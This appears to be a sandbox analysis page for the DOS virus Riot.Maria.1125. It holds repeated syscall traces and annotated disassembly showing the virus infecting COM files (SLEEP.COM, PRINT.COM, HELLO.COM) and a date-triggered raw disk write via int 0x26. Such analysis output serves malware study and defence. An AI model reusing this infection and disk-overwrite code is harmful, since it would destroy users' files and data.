Sample viewer

vx.netlux.org/Virus.DOS.Riot.Maria.1125


Syscalls:

Time Syscall Op Syscall Name
; Linear disassembly printed by the sandbox at the return address of the Get date call (op 42 = int 21h AH=2Ah).
; The code gates a raw disk write (int 0x26, DOS absolute disk write) on the day of the month.
; This run's recorded settings give Day 1, so the compare fails and the write is never reached here:
; no int 0x26 event appears in this trace. A different emulated date is needed to observe that path.
2018-12-17T22:45:26.241295139Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2 ; DL = day of month returned by Get date
0x12a5d: je 0x12a62 ; day 2: enter the disk-write path
0x12a5f: jmp 0x12a80 ; any other day: go straight to ret
0x12a61: nop
0x12a62: cli ; interrupts off before the raw write
0x12a63: mov ah, 2 ; NOTE(review): AH is not an int 0x26 input; presumably it only makes AX positive for the next byte
0x12a65: cdq ; NOTE(review): one-byte opcode in 16-bit code, presumably CWD, which would leave DX (start sector) = 0 — confirm
0x12a66: mov cx, 0x100 ; CX = sector count for int 0x26 (0x100 sectors)
0x12a69: int 0x26 ; DOS absolute disk write: AL = drive, CX = count, DX = first sector, DS:BX = buffer; AL is not set in this snippet
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3 ; drive number 3 (0 = A:, so D:) if this feeds int 0x26
0x12a71: mov cx, 0x2bc ; sector count 0x2bc
0x12a74: mov dx, 0 ; first sector 0
0x12a77: mov ds, word ptr [di + 0x63] ; buffer segment read from memory at DI+0x63
0x12a7a: mov bx, word ptr [di + 0x37] ; buffer offset read from memory at DI+0x37
0x12a7d: call 0x22a62 ; NOTE(review): 3-byte near call; target is printed without 16-bit IP wrap, likely 0x12a62 above — confirm
0x12a80: ret
0x12a81: lodsb al, byte ptr [si] ; bytes after ret, decoded linearly; may not belong to this routine
2018-12-17T22:45:26.244022732Z 71 PC: 12b49 | Get current directory
2018-12-17T22:45:26.248941901Z 59 PC: 12b54 | Change current directory
2018-12-17T22:45:26.25374421Z 26 PC: 12c08 | Set disk transfer address
2018-12-17T22:45:26.255507842Z 78 PC: 12c16 | Find first file
2018-12-17T22:45:26.270429808Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:45:26.283863999Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
; Linear disassembly printed by the sandbox at the return address of the Get time call (op 44 = int 21h AH=2Ch).
; It derives one byte from the clock, stores it in the program's own data, then clears the target file's
; attributes and reopens it read/write. The next three trace rows (PC 12ca8, 12cac, 12cb1) are these int 0x21 calls.
2018-12-17T22:45:26.29156337Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh ; DL = hundredths + seconds from Get time
0x12c90: je 0x12c8a ; sum is zero: jump back 4 bytes, presumably to re-issue Get time — confirm
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106] ; SI = 0x115 + word stored at 0x106 (presumably a relocation delta — confirm)
0x12c99: mov byte ptr [si], dl ; store the time-derived byte; NOTE(review): looks like a per-infection key or seed — confirm
0x12c9b: mov ax, 0x4301 ; int 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx ; CX = 0: clear all attributes, including read-only
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca ; DS:DX = file name at SI+0xca
0x12ca6: int 0x21 ; logged as "Get or set file attributes" at PC 12ca8
0x12ca8: mov ah, 0x3e ; int 21h AH=3Eh: close file (handle in BX)
0x12caa: int 0x21 ; logged as "Close file" at PC 12cac
0x12cac: mov ax, 0x3d02 ; int 21h AH=3Dh, AL=02h: open for read/write
0x12caf: int 0x21 ; logged as "Open file" at PC 12cb1
0x12cb1: jb 0x12c63 ; carry set means the open failed
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax ; save the new handle at ES:[DX+0x63]
0x12cb9: xchg ax, bx ; BX = handle for the calls that follow
0x12cba: mov ah, 0x40 ; int 21h AH=40h: write; the listing stops before the int 0x21
2018-12-17T22:45:26.294842899Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T22:45:26.312208284Z 62 PC: 12cac | Close file
2018-12-17T22:45:26.315739767Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:45:26.325662533Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:26.329026351Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.332166939Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.335510018Z 66 PC: 12cf4 | Move file pointer
2018-12-17T22:45:26.33758245Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.340057489Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T22:45:26.350048834Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.353817502Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T22:45:26.355656115Z 62 PC: 12d11 | Close file
2018-12-17T22:45:26.380558095Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T22:45:26.393566076Z 79 PC: 12c2a | Find next file
2018-12-17T22:45:26.396437579Z 61 PC: 12c42 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:45:26.402857006Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:45:26.417439304Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T22:45:26.42310818Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T22:45:26.435422258Z 62 PC: 12cac | Close file
2018-12-17T22:45:26.439068076Z 61 PC: 12cb1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:45:26.446837758Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:26.450424144Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.456303486Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.461163334Z 66 PC: 12cf4 | Move file pointer
2018-12-17T22:45:26.464995471Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.467947204Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T22:45:26.476731212Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.479218514Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T22:45:26.481243356Z 62 PC: 12d11 | Close file
2018-12-17T22:45:26.489704167Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T22:45:26.499070419Z 79 PC: 12c2a | Find next file
2018-12-17T22:45:26.501936041Z 61 PC: 12c42 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:45:26.509061423Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:45:26.515579154Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T22:45:26.517951991Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T22:45:26.528243219Z 62 PC: 12cac | Close file
2018-12-17T22:45:26.530421721Z 61 PC: 12cb1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:45:26.537090456Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:26.540981644Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.543808714Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.546546165Z 66 PC: 12cf4 | Move file pointer
2018-12-17T22:45:26.548943467Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.551991211Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T22:45:26.560260943Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.56362947Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T22:45:26.565657338Z 62 PC: 12d11 | Close file
2018-12-17T22:45:26.573071263Z 67 PC: 12d22 | Get or set file attributes
; Linear disassembly printed by the sandbox at the return address of a second Get date call (op 42).
; It compares month and day against one fixed date and branches. In this run the next logged call is at
; PC 12d9f, which is consistent with the not-equal branch (jmp 0x12d94) having been taken.
2018-12-17T22:45:26.582900524Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606 ; DH = month, DL = day: matches only on 6 June
0x12b73: je 0x12b78 ; date matches: take the 0x12d28 path, not exercised in this run
0x12b75: jmp 0x12d94 ; date differs: continue at 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh ; NOTE(review): bytes after an unconditional jmp; 0x12b7b-0x12b86 may be data decoded as code — confirm
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c ; reserve 0x2c bytes of stack
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a ; int 21h AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c] ; DTA = the 0x2c-byte stack buffer
0x12b93: int 0x21
0x12b95: mov ah, 0x4e ; int 21h AH=4Eh: find first file
0x12b97: mov cx, 0x10 ; attribute mask 0x10 = include directories
0x12b9a: mov dx, 0x1b8 ; DS:DX = search pattern at 0x1b8; the listing stops before the int 0x21
2018-12-17T22:45:26.585783208Z 59 PC: 12d9f | Change current directory
2018-12-17T22:45:26.589923984Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:15.682746652Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:15.685547258Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:15.688772237Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:15.693077839Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:15.69447551Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:15.701651346Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:15.7092291Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:15.719349421Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:15.722262619Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:15.742510479Z 62 PC: 12cac | Close file
2018-12-25T12:21:15.74433597Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:15.751692213Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:15.758878999Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:15.761689668Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:15.764996728Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:15.766623324Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.768999799Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:15.778686001Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.780433816Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:15.781679071Z 62 PC: 12d11 | Close file
2018-12-25T12:21:15.795653029Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:15.802359762Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:15.80443587Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:15.809792139Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:15.814451321Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:15.816033339Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:15.822773405Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:15.824528412Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:15.828811333Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:15.831154813Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:15.834237574Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:15.837100342Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:15.83861706Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.841380245Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:15.851209061Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.853625593Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:15.864592003Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:15.86994812Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:15.880677986Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:15.884787501Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:15.891966332Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:15.899121537Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:15.902068227Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:15.913475304Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:15.915397133Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:15.923555052Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:15.926721092Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:15.929429067Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:15.933005628Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:15.934749132Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.93720641Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:15.950247155Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.953474072Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:15.955665893Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:15.964551557Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:15.976506984Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:15.979045485Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:15.983491696Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:15.895727985Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:15.898852712Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:15.902097749Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:15.906701643Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:15.908643992Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:15.915338751Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:15.922395401Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:15.929288074Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:15.931693771Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:15.950607035Z 62 PC: 12cac | Close file
2018-12-25T12:21:15.953289519Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:15.960799151Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:15.96810041Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:15.970825612Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:15.974014853Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:15.975636456Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.980218496Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:15.990313143Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.992703909Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:15.994195431Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.003094579Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.013064903Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.014811622Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.019733299Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.023950744Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.025522218Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.032975856Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.034905926Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.041976205Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.044770637Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.047640396Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.0502468Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.051603427Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.054509808Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.064052678Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.066407476Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.072269634Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.07887793Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.089981124Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.092824637Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.097033259Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.101247159Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.103753303Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.110476035Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.111698226Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.116485108Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.118392582Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.120310337Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.123702774Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.125098659Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.127164394Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.136521641Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.138903151Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.140403609Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.148850616Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.160673926Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:16.173227233Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:16.177593289Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.11003441Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:16.113176716Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.116969852Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.121747306Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.124403258Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.131398039Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.139152501Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.146550945Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:16.149309752Z 67 PC: 12ca8 | Get or set file attributes
